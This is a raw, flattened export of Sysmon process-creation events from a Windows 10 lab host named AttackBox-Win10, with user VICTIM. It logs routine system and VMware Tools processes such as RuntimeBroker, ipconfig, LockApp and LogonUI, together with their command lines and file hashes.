KEYROAMINGC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=70588B44FF34097B6FC6A9A3C60DB022296D401D,MD5=88E39572A5A780CACF34F3C5B1F70906,SHA256=AE95807E817CEC8BBAA328B8576AAF68D8FE082FA1C6608A0FA80F2402B8AAE0,IMPHASH=3627BE269990D67CF76A03FA55EF9A08{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000657279Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:48.055{51A89197-C6FC-6552-8F02-000000001E00}5948C:\Windows\System32\RuntimeBroker.exe10.0.17134.1 (WinBuild.160101.0800)Runtime BrokerMicrosoft® Windows® Operating SystemMicrosoft CorporationRuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=12124C44EC062C96EFF72E4F87C5E6782E73ADCC,MD5=C7E36B4A5D9E6AC600DD7A0E0D52DAC5,SHA256=5C5AC5C17B10C47EFFEFF95687B6298773F74DCDB5BFA01CA185311343FDADCC,IMPHASH=7CB280A8578C9296B3E29AD28A96EF15{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000656213Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:42.057{51A89197-C6F6-6552-8B02-000000001E00}7744C:\Windows\System32\ipconfig.exe10.0.17134.1 (WinBuild.160101.0800)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig /renewC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=50A4778EB3B6002820B26D8D198A656DFE24E75B,MD5=C7FAFF418EF7AD7ABDA10A5BCF9B53EB,SHA256=9F160078947D7DAF42F02B541453AD143AEF1F60F1EB5107C4345337F7F96525,IMPHASH=2C6253F8FAA0D455F65586F8380D5C7A{51A89197-C6F4-6552-8802-000000001E00}1812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware 
Tools\resume-vm-default.bat""NT AUTHORITY\SYSTEM 154100x8000000000000000655856Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:41.062{51A89197-C6F5-6552-8902-000000001E00}7148C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C6F4-6552-8802-000000001E00}1812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""NT AUTHORITY\SYSTEM 154100x8000000000000000655742Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:40.717{51A89197-C6F4-6552-8802-000000001E00}1812C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-BE5F-6552-2E00-000000001E00}2168C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"NT AUTHORITY\SYSTEM 154100x8000000000000000655679Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:40.431{51A89197-C6F4-6552-8702-000000001E00}612C:\Windows\System32\taskhostw.exe10.0.17134.619 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft 
Corporationtaskhostw.exetaskhostw.exe C:\Windows\system32\wermgr.exe -uploadC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=70588B44FF34097B6FC6A9A3C60DB022296D401D,MD5=88E39572A5A780CACF34F3C5B1F70906,SHA256=AE95807E817CEC8BBAA328B8576AAF68D8FE082FA1C6608A0FA80F2402B8AAE0,IMPHASH=3627BE269990D67CF76A03FA55EF9A08{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000654375Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:58.551{51A89197-C6CA-6552-8602-000000001E00}6688C:\Windows\System32\backgroundTaskHost.exe10.0.17134.1 (WinBuild.160101.0800)Background Task HostMicrosoft® Windows® Operating SystemMicrosoft CorporationbackgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mcaC:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961AppContainerSHA1=EA114FDE884B16817A7D348660EA6FA1C217D315,MD5=B7FC4A29431D4F795BBAB1FB182B759A,SHA256=48B9EB1E31B0C2418742CE07675D58C974DD9F03007988C90C1E38F217F5C65B,IMPHASH=D2ACF1CBC4A6DB14A34C687B9362D66B{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000653745Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:57.946{51A89197-C6C9-6552-8502-000000001E00}7964C:\Windows\System32\RuntimeBroker.exe10.0.17134.1 (WinBuild.160101.0800)Runtime BrokerMicrosoft® Windows® Operating SystemMicrosoft CorporationRuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe 
-EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=12124C44EC062C96EFF72E4F87C5E6782E73ADCC,MD5=C7E36B4A5D9E6AC600DD7A0E0D52DAC5,SHA256=5C5AC5C17B10C47EFFEFF95687B6298773F74DCDB5BFA01CA185311343FDADCC,IMPHASH=7CB280A8578C9296B3E29AD28A96EF15{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000653006Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:57.373{51A89197-C6C9-6552-8402-000000001E00}7720C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe10.0.17134.1 (WinBuild.160101.0800)LockApp.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationLockApp.exe"C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mcaC:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961AppContainerSHA1=E56F862ECE36519B92FB25B4027250994080B7AF,MD5=B4A37529717E23500DAA83CB79B3F1C8,SHA256=71F7A7C7C514B487CE686855380C1E2D19DC0B049133A6B09D63BF82859AD531,IMPHASH=6333FEE3859A8D76ECD2A1896579A674{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000652576Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:56.699{51A89197-C6C8-6552-8302-000000001E00}872C:\Windows\System32\taskhostw.exe10.0.17134.619 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe 
KEYROAMINGC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=70588B44FF34097B6FC6A9A3C60DB022296D401D,MD5=88E39572A5A780CACF34F3C5B1F70906,SHA256=AE95807E817CEC8BBAA328B8576AAF68D8FE082FA1C6608A0FA80F2402B8AAE0,IMPHASH=3627BE269990D67CF76A03FA55EF9A08{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000652276Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:56.196{51A89197-C6C8-6552-8202-000000001E00}272C:\Windows\System32\LogonUI.exe10.0.17134.1 (WinBuild.160101.0800)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x0 /state0:0xa3fa8055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=0950DD0F72D2EB578A8609F82EA6D5EDBE4A96FF,MD5=3AAD3281A2953F4DDA09D7EE5BEE8BA6,SHA256=536ABC6D36A44A42C41263B0B470A5D2DB75B9291585AE4EFD94190C08C1C233,IMPHASH=B9B0B64B08B38276711093CA94348D39{51A89197-BE59-6552-0A00-000000001E00}588C:\Windows\System32\winlogon.exewinlogon.exeNT AUTHORITY\SYSTEM